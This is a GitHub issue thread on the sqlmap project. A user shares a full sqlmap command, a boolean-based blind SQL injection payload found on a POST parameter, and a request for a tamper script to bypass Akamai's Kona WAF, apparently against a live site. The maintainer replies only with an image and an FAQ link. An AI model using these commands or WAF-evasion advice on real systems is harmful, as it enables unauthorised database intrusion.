### ISSUE TITLE
MySQL with Kona Site Defender (Akamai Technologies)

### ISSUE THREAD

**Issue by viking2022** [sqlmapproject/sqlmap#5066]
--------unable to retrieve the database names---------

I will used that command :
sqlmap -r /home/manhunt/Desktop/buropost --dbs --batch --dbms="MySQL" --level=5 --risk=3 --tamper="space2comment" --random-agent -v 3 

It's just finding the DBMS name that is MySQL and the WAF is Kona . I'll try a lot of tamper and technique .
But i can't finding the databases name. 

I wanna know which tamper is good for Kona WAF ?

Target details:
 - DBMS [MySQL]
 - SQLi techniques found by sqlmap [Parameter: uniCodeInput (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: uniCodeInput=-3906) OR 5665=5665 AND (7990=7990&formaction=submit
    Vector: OR [INFERENCE]
]
 - WAF/IPS [Kona Site Defender (Akamai Technologies)]

**Comment by stamparm** [comment]
![image](https://user-images.githubusercontent.com/921555/163352537-1dacabac-279c-40ae-8290-70538e9ed711.png)

**Comment by stamparm** [comment]
https://github.com/sqlmapproject/sqlmap/wiki/FAQ#which-tamper-script-to-use-to-bypass-a-wafips-protection
